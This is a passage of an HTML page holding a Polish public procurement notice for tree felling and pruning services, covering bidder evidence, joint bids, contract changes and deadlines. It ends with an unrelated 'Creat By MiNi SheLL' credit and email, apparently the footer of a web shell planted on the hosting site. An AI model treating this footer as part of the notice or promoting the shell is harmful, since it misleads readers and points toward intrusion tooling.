z Załącznikiem nr 3 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych<br/>na dzień złożenia podmiotowych środków dowodowych, tj.<br/>1) wykazu wykonanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy - w tym okresie:<br/>- co najmniej 2 usług polegających na wycięciu drzew (w przypadku ubiegania się o przedmioty od 1 do<br/>7 zamówienia)<br/>- co najmniej 2 usług polegających na cięciach pielęgnacyjnych wykonanych w obrębie parków<br/>wpisanych do rejestru zabytków (w przypadku ubiegania się o przedmioty 3, 4, 5, 6 zamówienia)<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy<br/>czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na<br/>rzecz którego usługi były wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - oświadczenie wykonawcy. Wykaz usług winien być zgodny co do treści z załącznikiem nr 5 do SWZ, który zostanie udostępniony<br/>Wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych.<br/>2) przypadku ubiegania się o przedmioty 1, 3, 4, 5, 7 zamówienia - wykazu osób, skierowa-nych przez<br/>wykonawcę do realizacji zamówienia, w szczególności odpowiedzialnych za świad-czenie usług,<br/>potwierdzający dysponowanie:<br/>- co najmniej 1 osobą posiadającą: ukończone szkolenie branżowe – arborysty oraz minimum 3 letnie<br/>doświadczenie zawodowe w cięciu lub pielęgnacji drzew na wysokości;<br/>- co najmniej 1 osobą posiadającą: ukończone szkolenie branżowe – drwala (pilarza) oraz minimum 3<br/>letnie doświadczenie zawodowe w cięciu lub pielęgnacji drzew przy wykorzystaniu pilarki spalinowej<br/>wraz z informacjami na temat ich kalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami.<br/>Wykaz osób winien być zgodny co do treści z załącznikiem nr 6 do SWZ, który zostanie udostępniony<br/>Wykonawcy wraz z wezwaniem do złożenia podmiotowych środków dowodowych.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia (w tym prowadzący działalność w<br/>formie spółki cywilnej) zobowiązani są do dołączenia do oferty oświadczenia, z którego wynika,<br/>które usługi wykonają poszczególni wykonawcy.<br/>Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego. Przepisy dotyczące wykonawcy stosuje się<br/>odpowiednio do wykonawców wspólnie ubiegają-cych się o udzielenie zamówienia. W<br/>przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej<br/>Wykonawców warunek udziału w postepowaniu w zakresie wymaganego doświadczenia<br/>zostanie uznany za spełniony, jeżeli wykonawcy wspólnie wykażą się całym wymaganym<br/>doświadczeniem.. Oświadczenie o spełnianiu warunków i niepodleganiu wykluczeniu<br/>składa każdy z wykonawców –oświadczenia te potwierdzają brak<br/>podstaw do wykluczenia, spełnianie warunków udziału w postępowaniu, w zakresie, w jakim<br/>każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.6 Jeżeli została<br/>wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający<br/>może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych wykonawców. Umowa taka winna określać strony umowy, cel<br/>działania, sposób współdziałania, zakres prac przewidzianych do wykonania przez każdego z<br/>nich, solidarną odpowiedzialność za wykonanie zamówienia oraz termin, na jaki została zawarta<br/>umowa (który nie może być krótszy niż termin realizacji). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> w przypadku wystąpienia co najmniej jednej okoliczności wymienionej poniżej:<br/>1) Zmiana terminu realizacji przedmiotu umowy - w przypadku wystąpienia przeszkody lub<br/>utrudnień:<br/>a) spowodowanych klęskami żywiołowymi lub innymi trudnymi warunkami atmosferycznymi,<br/>uniemożliwiającymi terminową realizację przedmiotu umowy,<br/>b) będących następstwem okoliczności leżących po stronie Zamawiającego,<br/>c) będących następstwem działania osób trzecich,<br/>d) których źródłem było zdarzenie losowe, o którym niezwłocznie poinformowano<br/>Zamawiającego.<br/>e) W związku z wystąpieniem sytuacji, o której mowa w § 6 ust. 1 pkt 5.<br/>2) Zmiany osobowe:<br/>a) zmiana osoby, o której mowa w §3 umowy, na inną posiadającą uprawnienia<br/>do prowadzenia wycinki drzew.<br/>b) zmiana koordynatora lub osób odpowiedzialnych za nadzór nad prawidłowym wykonywaniem<br/>zamówienia po stronie Zamawiającego.<br/>3) Pozostałe zmiany:<br/>a) Siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z ofertą,<br/>b) Zmiana danych związanych z obsługą administracyjno – organizacyjną umowy<br/>(np. zmiana rachunku bankowego, umowy, zmiana adresu, itp.)<br/>2. Powyższe postanowienia stanowią katalog zmian, na które Zamawiający dopuszcza zgodę,<br/>nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody przez Zamawiającego.<br/>3. Wniosek Wykonawcy o dokonanie zmiany umowy musi być uzasadniony a okoliczności,<br/>na które powołuje się Wykonawca udokumentowane.<br/>4. Zamawiający zastrzega sobie termin 14 dni roboczych na zajęcie stanowiska odnośnie<br/>zmiany umowy, licząc od dnia złożenia przez Wykonawcę uzasadnionego i udokumentowanego<br/>wniosku.<br/>5. W przypadkach wymienionych w § 11 ust. 1 Zamawiający jest uprawniony do wyznaczenia<br/>nowego terminu realizacji umowy, odpowiedniego do zaistniałych okoliczności.<br/>6. Wszelkie zmiany niniejszej umowy wymagają formy pisemnego aneksu, pod rygorem<br/>nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kowr.eb2b.com.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-20</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Termin wykonania przedmiotu 6 zamówienia wynosi:<br/>- do 30.05.2022 roku - wykonanie nasadzeń zastępczych drzew -<br/>- 60 dni kalendarzowych licząc od dnia przekazania Wykonawcy terenu prowadzenia prac -<br/>wykonanie pozostałych prac objętych przedmiotem zamówienia.<br/>Ocenie podlega tylko termin 60-dniowy

Creat By MiNi SheLL
Email: jattceo@gmail.com